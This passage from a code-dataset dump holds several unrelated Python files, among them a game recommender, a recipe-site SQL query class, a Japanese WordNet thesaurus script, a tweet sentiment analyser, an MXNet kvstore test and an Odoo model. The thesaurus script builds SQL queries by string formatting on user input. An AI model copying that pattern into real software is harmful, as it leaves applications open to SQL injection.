user_item.merge(map_uid, on='user_id', how='left')\n\n# user_item_matrix = user_item[['user_id','index','bin']].pivot(index='user_id', columns='index', values = 'bin').fillna(0)\nuser_item_matrix2 = create_pivot_table(user_item)\n\n# pred = user_item_matrix2.dot(cosine_sim) / np.array([np.abs(cosine_sim).sum(axis=1)])\n\nmean_item_rating = np.nanmean(user_item_matrix2, axis=0)\nratings_diff = (user_item_matrix2 - mean_item_rating[np.newaxis, :])\n\narray = np.zeros((len(map_uid), len(map_pid)))\nindex = 0\nfor r1 in ratings_diff:\n if index %1000 == 0:\n print(index)\n sum_rated = np.nansum(np.where(np.isnan(r1), r1, cosine_sim), axis=1)\n dp = np.where(np.isnan(r1), 0.0, r1).dot(np.where(np.isnan(cosine_sim), 0.0, cosine_sim))\n dp = (np.nan_to_num(r1)).dot(cosine_sim)\n prod = np.nan_to_num(dp / sum_rated)\n array[index] = prod\n index = index + 1\n\npred = mean_item_rating[np.newaxis, :] + array\n\n# pred = mean_item_rating[np.newaxis, :] + ratings_diff.dot(cosine_sim) / np.array([np.abs(cosine_sim).sum(axis=1)])\n# print(pred)\ncontent_prediction = pred.clip(min=0)\n\ncontent_pred_df = pd.DataFrame(content_prediction, columns=list(map_pid['product_id']))\n\n# dict in the format {uid: [prod1, prod2, ..., prodN]}, stores all user's recommendations\nresults = []\n\n# iterate over all users\nfor index, user in enumerate(data['user_id'].unique().tolist()):\n if index % 1000 == 0:\n print(index)\n recommendations = recommend_movies(content_pred_df, user, games_data, user_item, 10)\n prod_rating = [(user, i, j) for i, j in\n zip(recommendations['product_id'].tolist(), recommendations['pred'].tolist())]\n results.extend(prod_rating)\n\n# df_results = pd.DataFrame({'user_id': list(chainer(repeat(k, len(v)) for k, v in results.items())), 'product_ratings': list(chainer(results.values()))})\ndf_results = pd.DataFrame(results, columns=['user_id', 'product_id', 'rating'])\n# df_results['product_ratings'].str[1:-1].str.split(',', expand=True).astype(float)\n\n# output results\ndf_results.to_csv(\"cb5000.csv\", index=False)\n\nprint(df_results.head(100))\n\n# test recommendations for one user\nrecommendations = recommend_movies(content_pred_df, 76561198022842797, games_data, user_item, 10)\nprint(recommendations)\n","repo_name":"ejakupi13/Uni-Projects","sub_path":"Content_Based_Recommendation.py","file_name":"Content_Based_Recommendation.py","file_ext":"py","file_size_in_byte":6338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3136150927","text":"\"\"\" Class for advanced SQL queries without DB changes \"\"\"\nimport pandas as pd\nfrom sqlalchemy import 
text, bindparam, String, Integer, Numeric\nfrom application.models import User, Recipe, Like, Consent\nimport datetime\n\n\nclass Sql_queries:\n def __init__(self, session):\n \"\"\"\n Make DB connection via session object available to all queries\n session: (Flask-)SQLAlchemy session object\n \"\"\"\n self.session = session\n\n def fuzzy_search(self, search_term, search_column=\"url\", N=160):\n \"\"\"\n DESCRIPTION:\n Searches in recipes table column url for strings that include the\n search_term. If none do, returns the top N results ordered\n by edit distance in ascending order.\n INPUT:\n search_term (str): String to look for in search_column\n search_column (str): Column to search (default=\"url\")\n N (int): Max number of results to return\n OUTPUT:\n results (list of RowProxy objects): query results\n \"\"\"\n # Most similar urls by edit distance that actually contain the\n # search_term\n query = text(\n \"\"\"\n SELECT \"recipesID\", \"title\", \"url\", \"perc_rating\",\n \"perc_sustainability\", \"review_count\", \"image_url\",\n \"emissions\", \"prop_ingredients\",\n LEVENSHTEIN(\"url\", :search_term) AS \"rank\"\n FROM public.recipes\n WHERE \"url\" LIKE :search_term_like\n ORDER BY \"rank\" ASC\n LIMIT :N\n \"\"\",\n bindparams=[\n bindparam(\"search_term\", value=search_term, type_=String),\n bindparam(\n \"search_term_like\", value=\"%\" + search_term + \"%\", type_=String\n ),\n bindparam(\"N\", value=N, type_=Integer),\n ],\n )\n results = self.session.execute(query).fetchall()\n\n # If no results contain the search_term\n if not results:\n query = text(\n \"\"\"\n SELECT \"recipesID\", \"title\", \"url\", \"perc_rating\",\n \"perc_sustainability\", \"review_count\", \"image_url\",\n \"emissions\", \"prop_ingredients\",\n LEVENSHTEIN(\"url\", :search_term) AS \"rank\"\n FROM public.recipes\n ORDER BY \"rank\" ASC\n LIMIT :N\n \"\"\",\n bindparams=[\n bindparam(\"search_term\", value=search_term, type_=String),\n bindparam(\"N\", value=N, type_=Integer),\n ],\n )\n results = self.session.execute(query).fetchall()\n return results\n\n def phrase_search(self, search_term, N=160):\n \"\"\"\n DESCRIPTION:\n Searches in table recipes in combined_tsv column using tsquery\n - a tsvector column in DB table recipes combining title and\n categories.\n INPUT:\n search_term (str): Search term\n N (int): Max number of results to return\n OUTPUT:\n results (list of RowProxy objects): DB query result\n \"\"\"\n query = text(\n \"\"\"\n SELECT \"recipesID\", \"title\", \"url\", \"perc_rating\",\n \"perc_sustainability\", \"review_count\", \"image_url\",\n \"emissions\", \"prop_ingredients\",\n ts_rank_cd(combined_tsv, query) AS rank\n FROM public.recipes,\n websearch_to_tsquery('simple', :search_term) query\n WHERE query @@ combined_tsv\n ORDER BY rank DESC\n LIMIT :N\n \"\"\",\n bindparams=[\n bindparam(\"search_term\", value=search_term, type_=String),\n bindparam(\"N\", value=N, type_=Integer),\n ],\n )\n results = self.session.execute(query).fetchall()\n return results\n\n def free_search(self, search_term, N=160):\n \"\"\"\n DESCRIPTION:\n Parent function for searching recipes freely. At the moment\n it only calls phrase_search. 
But having this function makes\n it easier to extend in the future.\n INPUT:\n search_term (str)\n N (int): Max number of results to return\n OUTPUT:\n results (list of RowProxy objects): DB query result\n NOTES:\n See https://www.postgresql.org/docs/12/textsearch-controls.html\n for details on postgres' search functionalities.\n \"\"\"\n results = self.phrase_search(search_term, N=N)\n if not results:\n results = self.fuzzy_search(search_term, N=N - len(results))\n return results\n\n def query_content_similarity_ids(self, search_term):\n \"\"\"\n DESCRIPTION:\n Searches in connected postgres DB for a search_term in\n 'url' column and returns recipeIDs of similar recipes based\n on content similarity.\n INPUT:\n search_term (str): Search term\n OUTPUT:\n CS_ids (tuple): Content based similarity ID vector ordered by\n similarity in descending order\n \"\"\"\n query = text(\n \"\"\"\n SELECT * FROM public.content_similarity200_ids\n WHERE \"recipeID\" = (\n SELECT \"recipesID\" FROM public.recipes\n WHERE \"url\" = :search_term)\n \"\"\",\n bindparams=[bindparam(\"search_term\", value=search_term, type_=String)],\n )\n CS_ids = self.session.execute(query).fetchall()[0][1::]\n CS_ids = tuple([abs(int(CSid)) for CSid in CS_ids])\n return CS_ids\n\n def query_content_similarity(self, search_term):\n \"\"\"\n DESCRIPTION:\n Searches in connected postgres DB for a search_term in\n 'url' and returns content based similarity.\n INPUT:\n search_term (str): Search term\n OUTPUT:\n CS (tuple): Content based similarity vector ordered by\n similarity in descending order\n \"\"\"\n query = text(\n \"\"\"\n SELECT * FROM public.content_similarity200\n WHERE \"recipeID\" = (\n SELECT \"recipesID\" FROM public.recipes\n WHERE url = :search_term)\n \"\"\",\n bindparams=[bindparam(\"search_term\", value=search_term, type_=String)],\n )\n CS = self.session.execute(query).fetchall()[0][1::]\n CS = tuple([abs(float(s)) for s in CS])\n return CS\n\n def query_similar_recipes(self, CS_ids):\n \"\"\"\n DESCRIPTION:\n fetch recipe information of similar recipes based on the recipe IDs\n given by CS_ids\n INPUT:\n CS_ids (tuple): Tuple of recipe IDs\n OUTPUT:\n recipes_sql (list of RowProxy objects): DB query result\n \"\"\"\n query = text(\n \"\"\"\n SELECT \"recipesID\", \"title\", \"ingredients\",\n \"rating\", \"calories\", \"sodium\", \"fat\",\n \"protein\", \"emissions\", \"prop_ingredients\",\n \"emissions_log10\", \"url\", \"servings\", \"recipe_rawid\",\n \"image_url\", \"perc_rating\", \"perc_sustainability\",\n \"review_count\"\n FROM public.recipes\n WHERE \"recipesID\" IN :CS_ids\n \"\"\",\n bindparams=[bindparam(\"CS_ids\", value=CS_ids, type_=Numeric)],\n )\n recipes_sql = self.session.execute(query).fetchall()\n return recipes_sql\n\n def exact_recipe_match(self, search_term):\n \"\"\"\n DESCRIPTION:\n Return True if search_term is in recipes table of\n cur database, False otherwise.\n \"\"\"\n query = text(\n \"\"\"\n SELECT * FROM public.recipes\n WHERE \"url\" = :search_term\n \"\"\",\n bindparams=[bindparam(\"search_term\", value=search_term, type_=String)],\n )\n if self.session.execute(query).fetchall():\n return True\n else:\n return False\n\n def content_based_search(self, search_term):\n \"\"\"\n DESCRIPTION:\n return the 200 most similar recipes to the url defined\n in based on cosine similarity in the \"categories\"\n space of the epicurious dataset.\n INPUT:\n search_term (str): url identifier for recipe (in recipes['url'])\n OUTPUT:\n results (dataframe): Recipe dataframe similar to 
recipes, but\n containing only the Nsim most similar recipes to the input.\n Also contains additional column \"similarity\".\n \"\"\"\n # Select recipe IDs of 200 most similar recipes to reference\n CS_ids = self.query_content_similarity_ids(search_term)\n\n # Also select the actual similarity scores\n CS = self.query_content_similarity(search_term)\n\n # Finally, select similar recipes themselves\n # Get only those columns I actually use to speed things up\n # Note that column names are actually different in sql and pandas\n # So if you want to adjust this, adjust both!\n # TODO: Make column names similar in pandas and sql!\n col_sel = [\n \"recipesID\",\n \"title\",\n \"ingredients\",\n \"rating\",\n \"calories\",\n \"sodium\",\n \"fat\",\n \"protein\",\n \"emissions\",\n \"prop_ing\",\n \"emissions_log10\",\n \"url\",\n \"servings\",\n \"index\",\n \"image_url\",\n \"perc_rating\",\n \"perc_sustainability\",\n \"review_count\",\n ]\n recipes_sql = self.query_similar_recipes(CS_ids)\n\n # Obtain a dataframe for further processing\n results = pd.DataFrame(recipes_sql, columns=col_sel)\n\n # Add similarity scores to correct recipes (using recipesID again)\n temp = pd.DataFrame({\"CS_ids\": CS_ids, \"similarity\": CS})\n results = results.merge(\n temp, left_on=\"recipesID\", right_on=\"CS_ids\", how=\"left\"\n )\n\n # Assign data types (sql output might be decimal, should\n # be float!)\n numerics = [\n \"recipesID\",\n \"rating\",\n \"calories\",\n \"sodium\",\n \"fat\",\n \"protein\",\n \"emissions\",\n \"prop_ing\",\n \"emissions_log10\",\n \"index\",\n \"perc_rating\",\n \"perc_sustainability\",\n \"similarity\",\n \"review_count\",\n ]\n strings = [\"title\", \"ingredients\", \"url\", \"servings\", \"image_url\"]\n for num in numerics:\n results[num] = pd.to_numeric(results[num])\n for s in strings:\n results[s] = results[s].astype(\"str\")\n\n # Order results by similarity\n results = results.sort_values(by=\"similarity\", ascending=False)\n\n return results\n\n def search_recipes(self, search_term, N=160):\n \"\"\"\n DESCRIPTION:\n Does a free search for recipes based on user's search term. 
If an\n exact match exists, does a content based search and returns the\n resulting DataFrame.\n INPUT:\n search_term (str): Search term input by user into search bar\n N (int): Max number of results to return\n OUTPUT:\n df (pd.DataFrame): DataFrame with recipes as rows\n \"\"\"\n outp = self.free_search(search_term, N)\n\n if outp[0][2] == search_term:\n return self.content_based_search(search_term)\n\n col_names = [\n \"recipesID\",\n \"title\",\n \"url\",\n \"perc_rating\",\n \"perc_sustainability\",\n \"review_count\",\n \"image_url\",\n \"ghg\",\n \"prop_ingredients\",\n \"rank\",\n ]\n\n results = pd.DataFrame(outp, columns=col_names)\n\n # Assign data types (sql output might be decimal, should\n # be float!)\n numerics = [\n \"recipesID\",\n \"perc_rating\",\n \"ghg\",\n \"prop_ingredients\",\n \"perc_rating\",\n \"perc_sustainability\",\n \"review_count\",\n ]\n strings = [\"title\", \"url\", \"image_url\"]\n for num in numerics:\n results[num] = pd.to_numeric(results[num])\n for s in strings:\n results[s] = results[s].astype(\"str\")\n\n # Order results by rank / edit_dist\n results = results.sort_values(by=\"rank\", ascending=False)\n return results\n\n def query_all_recipe_emissions(self):\n \"\"\"\n DESCRIPTION:\n Retrieves emission scores from all recipes, their title and url.\n INPUT:\n None\n OUTPUT:\n df (pandas.DataFrame): With columns \"recipesID\", \"emissions\",\n \"emissions_log10\", \"url\", \"title\"\n \"\"\"\n query = self.session.query(\n Recipe.recipesID,\n Recipe.emissions,\n Recipe.emissions_log10,\n Recipe.url,\n Recipe.title,\n )\n return pd.read_sql(query.statement, self.session.bind)\n\n def query_cookbook(self, userID):\n \"\"\"\n DESCRIPTION:\n Creates a pandas dataframe containing all recipes the given\n user has liked / added to the cookbook.\n INPUT:\n userID (Integer)\n OUTPUT:\n cookbook (pd.DataFrame)\n \"\"\"\n query = text(\n \"\"\"\n SELECT u.\"userID\", u.username,\n l.created, l.rating,\n r.title, r.url, r.perc_rating, r.perc_sustainability,\n r.review_count, r.image_url, r.emissions, r.prop_ingredients,\n r.categories\n FROM users u\n JOIN likes l ON (u.username = l.username)\n JOIN recipes r ON (l.\"recipesID\" = r.\"recipesID\")\n WHERE u.\"userID\" = :userID\n ORDER BY l.rating\n \"\"\",\n bindparams=[bindparam(\"userID\", value=userID, type_=Integer)],\n )\n recipes = self.session.execute(query).fetchall()\n\n # Convert to DataFrame\n colsel = [\n \"userID\",\n \"username\",\n \"created\",\n \"user_rating\",\n \"title\",\n \"url\",\n \"perc_rating\",\n \"perc_sustainability\",\n \"review_count\",\n \"image_url\",\n \"emissions\",\n \"prop_ingredients\",\n \"categories\",\n ]\n results = pd.DataFrame(recipes, columns=colsel)\n\n # Assign data types\n numerics = [\n \"userID\",\n \"user_rating\",\n \"perc_rating\",\n \"perc_sustainability\",\n \"review_count\",\n \"emissions\",\n \"prop_ingredients\",\n ]\n strings = [\"username\", \"title\", \"url\", \"image_url\", \"categories\"]\n datetimes = [\"created\"]\n\n for num in numerics:\n results[num] = pd.to_numeric(results[num])\n for s in strings:\n results[s] = results[s].astype(\"str\")\n for dt in datetimes:\n results[dt] = pd.to_datetime(results[dt])\n\n return results\n\n def query_bookmarks(self, userID, urls):\n \"\"\"\n DESCRIPTION:\n For all recipes (given in list urls) check if it has\n been bookmarked by the user (return boolean list).\n INPUT:\n userID (Integer): userID from users table\n urls (List of strings): Url strings from recipes table\n OUTPUT:\n Pandas DataFrame with 
columns 'recipesID' and 'bookmarked'\n \"\"\"\n sql_query = (\n self.session.query(Recipe, Like)\n .join(Like, Like.recipesID == Recipe.recipesID, isouter=True)\n .filter(Like.userID == userID, Recipe.url.in_(urls))\n )\n df = pd.read_sql(sql_query.statement, self.session.bind)\n\n # I got 2 recipeID columns, keep only one!\n df = df.loc[:, ~df.columns.duplicated()]\n return df[[\"recipesID\", \"bookmarked\"]]\n\n def is_in_cookbook(self, userID, url):\n \"\"\"\n DESCRIPTION:\n Check if a recipe (given by url) is already in a user's\n cookbook (given by userID)\n INPUT:\n userID (Integer): userID from users table\n url (String): Url string from recipes table\n OUTPUT:\n Boolean\n \"\"\"\n # Get recipesID\n recipe = Recipe.query.filter_by(url=url).first()\n if not recipe:\n return False\n\n # Query like entries\n like = Like.query.filter_by(userID=userID, recipesID=recipe.recipesID).first()\n if like:\n return True\n return False\n\n def add_to_cookbook(self, userID, url):\n \"\"\"\n DESCRIPTION:\n Creates a new entry in the likes table for a given user\n and recipe.\n INPUT:\n userID (Integer): userID from users table\n url (String): Url string from recipes table\n OUTPUT:\n None\n \"\"\"\n if self.is_in_cookbook(userID, url):\n return \"Cookbook entry already exists\"\n # Get username and recipesID\n user = User.query.filter_by(userID=userID).first()\n recipe = Recipe.query.filter_by(url=url).first()\n\n # Create new like entry\n if user and recipe:\n like = Like(\n username=user.username,\n bookmarked=True,\n userID=userID,\n recipesID=recipe.recipesID,\n created=datetime.datetime.utcnow(),\n )\n self.session.add(like)\n self.session.commit()\n return \"Cookbook entry added successfully\"\n return \"UserID or recipe url invalid\"\n\n def remove_from_cookbook(self, userID, url):\n \"\"\"\n DESCRIPTION:\n Removes an existing entry in the likes table for a given\n user and recipe.\n INPUT:\n userID (Integer): userID from users table\n url (String): Url string from recipes table\n OUTPUT:\n String: Feedback message\n \"\"\"\n if self.is_in_cookbook(userID, url):\n recipe = Recipe.query.filter_by(url=url).first()\n like = Like.query.filter_by(\n userID=userID, recipesID=recipe.recipesID\n ).first()\n self.session.delete(like)\n self.session.commit()\n return \"Removed recipe from cookbook successfully\"\n return \"Recipe was not bookmarked to begin with\"\n\n def query_user_ratings(self, userID, urls):\n \"\"\"\n DESCRIPTION:\n Query all rows in likes table with the given userID\n for all elements in urls\n INPUT:\n userID (Integer): userID from users table\n urls (List of strings): Url strings from recipes table\n OUTPUT:\n df (pandas.DataFrame): Has columns [likeID, userID, recipesID,\n username, bookmarked, user_rating, created], can be empty.\n NOTE:\n A like entry may exist even if the user has not explicitly\n rated a recipe - it may only have been bookmarked\n \"\"\"\n recipesIDs = (\n self.session.query(Recipe.recipesID).filter(Recipe.url.in_(urls)).all()\n )\n likes_query = self.session.query(Like).filter(\n Like.userID == userID, Like.recipesID.in_(recipesIDs)\n )\n df = pd.read_sql(likes_query.statement, self.session.bind)\n df.rename(columns={\"rating\": \"user_rating\"}, inplace=True)\n return df\n\n def rate_recipe(self, userID, url, rating):\n \"\"\"\n DESCRIPTION:\n Add or update user rating to bookmarked recipe in DB.\n INPUT:\n userID (Integer): userID from users table\n url (String): Recipe url tag\n OUTPUT:\n None\n \"\"\"\n # Get recipeID\n recipeID = (\n 
self.session.query(Recipe.recipesID).filter(Recipe.url == url).first()\n )\n\n # Find relevant likes row\n like = Like.query.filter_by(userID=userID, recipesID=recipeID).first()\n\n # Like row found, modify\n if like:\n like.rating = rating\n self.session.commit()\n\n # Like row not found, create new like entry (without bookmark)\n else:\n user = User.query.filter_by(userID=userID).first()\n recipe = Recipe.query.filter_by(url=url).first()\n if user and recipe:\n like = Like(\n username=user.username,\n bookmarked=False,\n userID=userID,\n recipesID=recipe.recipesID,\n created=datetime.datetime.utcnow(),\n rating=rating,\n )\n self.session.add(like)\n self.session.commit()\n\n def delete_account(self, userID):\n \"\"\"\n DESCRIPTION:\n Removes an existing user entry from users table,\n and corresponding rows in consent and likes tables.\n INPUT:\n userID (Integer): userID from users table\n OUTPUT:\n String: Feedback message\n \"\"\"\n user = User.query.filter_by(userID=userID).first()\n if user:\n\n # delete likes of user (in likes table)\n Like.query.filter_by(userID=userID).delete()\n\n # delete consent of user (in consent table)\n Consent.query.filter_by(userID=userID).delete()\n\n # delete user (in users table)\n self.session.delete(user)\n self.session.commit()\n return \"Removed user account successfully\"\n return \"User not found. Nothing was removed.\"\n\n def change_newsletter_subscription(self, userID):\n \"\"\"\n DESCRIPTION:\n Negates current newsletter subscription status of user.\n INPUT:\n userID (Integer): userID from users table\n OUTPUT:\n String: Feedback message\n \"\"\"\n user = User.query.filter_by(userID=userID).first()\n if user:\n new_subscription_status = True\n if user.optin_news:\n new_subscription_status = False\n user.optin_news = new_subscription_status\n self.session.commit()\n if new_subscription_status:\n return 'Changed newsletter subscription to \"subscribed\"'\n return 'Changed newsletter subscription to \"unsubscribed\"'\n return \"User not found\"\n\n\n# eof\n","repo_name":"sbuergers/sustainable-recipe-recommender-website","sub_path":"application/sql_queries.py","file_name":"sql_queries.py","file_ext":"py","file_size_in_byte":22637,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"15175070921","text":"# -*- coding: utf-8 -*\n\"\"\" thesaurus.py\nこのスクリプトは, 日本語 WordNet のデータベースファイルから,\n特定の語の類義語を検索します\n\"\"\"\nfrom os import path\n\nclass WordNet(object):\n \"\"\"\n WordNet の DB ファイルに接続し,\n 種々の検索を行���クラスです.\n \"\"\"\n\n def __init__(self):\n from sqlite3 import connect\n thisdir = path.dirname(path.abspath('__file__'))\n dbfile = path.abspath(path.join(thisdir, 'var', 'wnjpn.db'))\n self.con = connect(dbfile)\n\n def get_wordid(self, word):\n \"\"\"\n 特定の語のワードIDを取得します\n \"\"\"\n sql = 'select * from word where lemma=\"{0}\";'.format(\n word\n )\n return [row[0] for row in self.con.execute(sql)]\n\n def get_synset(self, wordid):\n \"\"\"\n 特定のワードID が属する類似語 ID を取得します\n \"\"\"\n sql = 'select * from sense where wordid = {0};'.format(\n wordid\n )\n return [row[0] for row in self.con.execute(sql)]\n\n def get_synonym(self, synset, lang='eng'):\n \"\"\"\n 特定の synset から類義語を取得します\n \"\"\"\n sql = ' '.join(\n [\n 'select lemma from sense, word where synset=\"{0}\"'.format(\n synset\n ),\n 'and word.lang=\"{0}\"'.format(lang),\n 'and sense.wordid = word.wordid;'\n ]\n )\n return [row[0] for row in self.con.execute(sql)]\n\n def get_synonym_by_link(self, synset, link):\n \"\"\"\n 入力で与えられた synset ID 
から,\n 下位語や下位語を検索します\n\n ここで下位語を検索する場合には, link='hypo',\n 上位語を検索する場合には, link='hype' を入力してください.\n その他の関連に関しては, 以下のページの第四項を参照してください.\n\n - http://compling.hss.ntu.edu.sg/wnja/jpn/detail.html\n \"\"\"\n sql = ' '.join([\n 'SELECT lemma FROM synlink, sense, word',\n 'WHERE link =\"{0}\"'.format(link),\n 'AND synset1 = \"{0}\"'.format(synset),\n 'AND synset2 = synset',\n 'AND sense.wordid = word.wordid',\n 'AND word.lang=\"eng\";'\n ])\n return [row[0] for row in self.con.execute(sql)]\n\n\ndef get_synonym(word):\n \"\"\"\n 引数 word で指定した語の類義語を検索します\n \"\"\"\n synonyms = []\n wn = WordNet()\n wordids = wn.get_wordid(word)\n for i in wordids:\n synsetids = wn.get_synset(i)\n for synid in synsetids:\n synonyms.extend(wn.get_synonym(synid))\n synonyms = sorted(list(set(synonyms)))\n return synonyms\n\n\ndef get_synonym_by_link(word, link):\n \"\"\"\n 引数 word で指定した語の link で指定された関係語を検索します.\n \"\"\"\n synonyms = []\n wn = WordNet()\n wordids = wn.get_wordid(word)\n for i in wordids:\n synsetids = wn.get_synset(i)\n for synid in synsetids:\n synonyms.extend(wn.get_synonym_by_link(synid, link))\n synonyms = sorted(list(set(synonyms)))\n synonyms.pop(synonyms.index(word))\n return synonyms\n\n\n# vim 呼出用関数\ndef thesaurus_get_synonym(word):\n synonyms = get_synonym(word)\n for synonym in synonyms:\n print(\"{0}\".format(synonym))\n\n\nif __name__ == \"__main__\":\n from argparse import ArgumentParser\n desc = \"Shearch synonyms form args.\"\n PARSER = ArgumentParser(description=desc)\n PARSER.add_argument(\n \"words\",\n help=\"words you want to sherch.\",\n nargs='*'\n )\n link_help = ' '.join([\n \"type of word link, like hype or hypo.\",\n \"see cap.4 in http://compling.hss.ntu.edu.sg/wnja/jpn/detail.html\"\n ])\n PARSER.add_argument(\n \"--link\", \"-l\", help=link_help\n )\n ARGS = PARSER.parse_args()\n ARGS = PARSER.parse_args()\n for word in ARGS.words:\n print(\"# {0} を検索します.\".format(word))\n if ARGS.link:\n for synonym in get_synonym_by_link(word, ARGS.link):\n print(\"- {0}\".format(synonym))\n else:\n for synonym in get_synonym(word):\n print(\"- {0}\".format(synonym))\n","repo_name":"qh73xe/thesaurus.vim","sub_path":"src/thesaurus.py","file_name":"thesaurus.py","file_ext":"py","file_size_in_byte":4304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74376498668","text":"#!/usr/bin/python3\nfrom textblob import TextBlob\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import sent_tokenize,word_tokenize\n\nf = open(\"/home/bhavyaagrawal/Desktop/tweets.txt\",\"r+\")\n\n# data redaing from file\ndata = f.read()\nprint(\"data @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ \")\nprint(data)\n\n#clening the data by first tockenizing then removing stopwords\n\n# tokenize data as per words\ntoken_data = word_tokenize(data)\n\n\n# now remove unwanted or extra words from tockenized data\nfresh_data = [i for i in token_data if i not in stopwords.words('english')]\n#print(type(fresh_data)) its return type is list \n\n# plotting graph using top 20 most frequent words\nfreq_data = nltk.FreqDist(fresh_data)\nfreq_data.plot(20)\n\n#print(fresh_data)\n#fresh data is in form of list to convert it again into string\n\nclean_data = ' '.join(fresh_data)\nprint(\"clean_data ###################################################################\")\nprint(clean_data)\n\n# sentimental analysis on the data \nfor i in fresh_data:\n\tanalysing_data = TextBlob(i)\n\tsentiments = 
analysing_data.sentiment\n\tprint(sentiments)\n\tprint(type(sentiments))\t\n\tif sentiments.polarity == 0:\n\t\tprint(\"feelings are neutral\")\n\n\telif sentiments.polarity < 0:\n\t\tprint(\"feelings are negative\")\n\n\telif sentiments.polarity > 0:\n\t\tprint(\"feelings are positive\")\n\n\telse:\n\t\tprint(\"sentiments are not obtained correctly\")\t\n\t\n","repo_name":"Bhavya-Agrawal/NLP_Projects","sub_path":"Tweet_Analysis/sentiment_analysis_from_file.py","file_name":"sentiment_analysis_from_file.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"724455635","text":"import sys\nsys.path.insert(0, \"../../python/\")\nimport mxnet as mx\nimport numpy as np\nimport numpy.random as rnd\nimport time\n\ndef check_diff_to_scalar(A, x, rank=None):\n \"\"\" assert A == x\"\"\"\n assert(np.sum(np.abs((A - x).asnumpy())) == 0), (rank, A.asnumpy(), x)\n\n# setup\nkeys = ['3', '5', '7']\ninit_test_keys = [str(i) for i in range(200,300)]\ninit_test_keys_big = [str(i) for i in range(300,400)]\ninit_test_keys_device = [str(i) for i in range(400,500)]\ninit_test_keys_device_big = [str(i) for i in range(500,600)]\n\nrate = 2\nshape = (2, 3)\nbig_shape = (1200, 1200) # bigger than MXNET_KVSTORE_BIGARRAY_BOUND\n\nkv = mx.kv.create('dist_device_sync')\n\ndef init_kv():\n # init kv dns keys\n kv.init(keys, [mx.nd.ones(shape)] * len(keys))\n kv.init('99', mx.nd.ones(big_shape))\n # worker info\n my_rank = kv.rank\n nworker = kv.num_workers\n # init updater on servers\n kv.set_optimizer(mx.optimizer.create('test', rescale_grad=rate))\n return kv, my_rank, nworker\n\ndef test_sync_push_pull():\n kv, my_rank, nworker = init_kv()\n num_gpus = 2\n def check_default_keys(kv, my_rank, nworker):\n nrepeat = 3\n # checks pull after push in loop, because behavior during\n # consecutive pushes doesn't offer any guarantees\n for i in range(nrepeat):\n scale = my_rank + 1\n kv.push('3', [mx.nd.ones(shape, ctx=mx.gpu(j)) * scale for j in range(num_gpus)])\n kv.push('99', [mx.nd.ones(big_shape, ctx=mx.gpu(j)) * scale for j in range(num_gpus)])\n num = (nworker + 1) * nworker * rate * num_gpus / 2 * (i + 1) + 1\n val = mx.nd.zeros(shape)\n kv.pull('3', out=val)\n check_diff_to_scalar(val, num)\n val2 = mx.nd.zeros(big_shape)\n kv.pull('99', out=val2)\n check_diff_to_scalar(val2, num)\n\n check_default_keys(kv, my_rank, nworker)\n print('worker ' + str(my_rank) + ' is done')\n\ndef test_sync_init():\n def check_init(kv, cur_keys, cur_shape, device=False):\n ctx = mx.gpu(0) if device else mx.cpu()\n val = [mx.nd.zeros(cur_shape, ctx) for i in cur_keys]\n for i in range(len(cur_keys)):\n expected = i\n kv.init(cur_keys[i], [mx.nd.ones(cur_shape, ctx) * i])\n kv.pull(cur_keys[i], out=val[i])\n check_diff_to_scalar(val[i], expected)\n check_init(kv, init_test_keys, shape)\n check_init(kv, init_test_keys_big, big_shape)\n check_init(kv, init_test_keys_device, shape, device=True)\n check_init(kv, init_test_keys_device_big, big_shape, device=True)\n my_rank = kv.rank\n print('worker ' + str(my_rank) + ' is initialized')\n\nif __name__ == \"__main__\":\n test_sync_init()\n test_sync_push_pull()\n","repo_name":"hpi-xnor/BMXNet","sub_path":"tests/nightly/dist_device_sync_kvstore.py","file_name":"dist_device_sync_kvstore.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"38726333025","text":"from odoo import api, fields, 
models\n\n\nclass ProductAttributeValue(models.Model):\n\n _inherit = 'product.attribute.value'\n\n report_price_extra = fields.Float(\n 'Attribute Price Extra',\n compute='_compute_report_price_extra')\n\n @api.depends()\n def _compute_report_price_extra(self):\n \"\"\"\n \"\"\"\n product_tmpl_id = self._context.get('active_id', False)\n if not product_tmpl_id:\n return\n product_tmpl = self.env['product.template'].browse(product_tmpl_id)\n company, partner = self.env['res.partner'].get_company_partner()\n pricelist = self.env['product.pricelist'].browse(\n self._context.get('pricelist'))\n\n taxes_included = not partner._get_vat_discriminated(partner, company)\n ret = 'total_included' if taxes_included else 'total_excluded'\n if taxes_included:\n for rec in self:\n taxes = partner.property_account_position_id.map_tax(\n product_tmpl.sudo().taxes_id.filtered(\n lambda x: x.company_id == company))\n rec.report_price_extra = taxes.sudo().compute_all(\n rec.price_extra, pricelist.currency_id)[ret]\n else:\n for rec in self:\n rec.report_price_extra = rec.price_extra\n","repo_name":"royalline1/website","sub_path":"l10n_ar_website_sale/models/product_attribute_value.py","file_name":"product_attribute_value.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"42394454620","text":"import re\nimport time\nimport logging\n\nimport pandas as pd\nimport numpy as np\n\nfrom bs4 import BeautifulSoup\n\nimport nltk.data\n# nltk.download() # Download text data sets, including stop words\nfrom nltk.corpus import stopwords\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.cluster import KMeans\n\nfrom gensim.models import Word2Vec\n\n\ndef review_to_wordlist(review, remove_stopwords=False):\n # Function to convert a document to a sequence of words,\n # optionally removing stop words. Returns a list of words.\n #\n # 1. Remove HTML\n review_text = BeautifulSoup(review).get_text()\n #\n # 2. Remove non-letters\n review_text = re.sub(\"[^a-zA-Z]\", \" \", review_text)\n #\n # 3. Convert words to lower case and split them\n words = review_text.lower().split()\n #\n # 4. Optionally remove stop words (false by default)\n if remove_stopwords:\n stops = 